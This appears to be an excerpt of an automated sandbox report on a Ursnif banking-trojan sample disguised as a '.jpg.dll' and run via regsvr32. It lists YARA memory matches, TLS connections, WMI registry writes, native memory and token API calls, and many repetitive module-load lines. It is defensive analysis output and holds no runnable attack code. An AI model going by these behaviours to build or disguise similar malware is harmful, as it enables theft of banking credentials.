            Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
            Source: iab2Data[1].json.5.drString found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.298876856.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298930970.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298914793.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.628060995.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298824563.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298690231.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298657792.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298734803.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298607542.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6396, type: MEMORY
            Source: loaddll32.exe, 00000000.00000002.624417860.0000000000A5B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.298876856.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298930970.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298914793.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.628060995.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298824563.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298690231.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298657792.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298734803.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298607542.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6396, type: MEMORY

            System Summary:

            barindex
            PE file has a writeable .text sectionShow sources
            Source: pan0ramic0.jpg.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00401DD0 GetProcAddress,NtCreateSection,memset,1_2_00401DD0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00401812 NtMapViewOfSection,1_2_00401812
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004022E5 NtQueryVirtualMemory,1_2_004022E5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F69932 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_04F69932
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6B2C1 NtQueryVirtualMemory,1_2_04F6B2C1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E1029D NtProtectVirtualMemory,1_2_04E1029D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E1009C NtAllocateVirtualMemory,1_2_04E1009C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E10066 NtAllocateVirtualMemory,1_2_04E10066
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004020C41_2_004020C4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6B09C1_2_04F6B09C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6EC411_2_04F6EC41
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6EC481_2_04F6EC48
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F699FC1_2_04F699FC
            Source: pan0ramic0.jpg.dllStatic PE information: invalid certificate
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wmi.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
